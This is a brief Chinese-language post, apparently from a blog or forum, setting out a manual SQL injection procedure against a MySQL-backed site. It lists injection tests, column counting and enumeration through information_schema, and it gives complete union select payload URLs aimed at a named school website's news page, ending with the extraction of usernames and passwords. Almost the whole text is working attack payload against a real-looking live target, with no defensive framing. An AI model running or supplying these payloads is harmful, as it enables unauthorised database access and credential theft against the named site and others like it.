1.利用and 1=1 1=2判断有没注入点
2.利用order by 判断字段. 参数从大到小.
3.利用user()查数据库当前用户名。
4.利用database()查库名。
5.利用version()查版本。大于5.0版本的可以使用虚拟库。
6.利用union select判断字段应该存在什么地方。 显示数字!!!!!!
7.利用table_name判断表名。参数 0,1-- 从小到大
table_schema
from information_schema.tables
where table_schema=
limit 0,1--
table_name
column_name
from information_schema.columns
where table_name=
http://www.hkct.edu.hk/news_detail.php?id=73 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from information_schema.tables where table_schema=0x726576616D70 limit 0,1--
0.利用column_name判断字名。参数 0,1-- 从小到大
http://www.hkct.edu.hk/news_detail.php?id=73 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x726576616D70 limit 0,1--
0.利用http://www.hkct.edu.hk/news_detail.php?id=73 and 1=2 union select 1,2,3,(字名),5,6,7,8,9,10,11 from (表名)获取 username and password
评论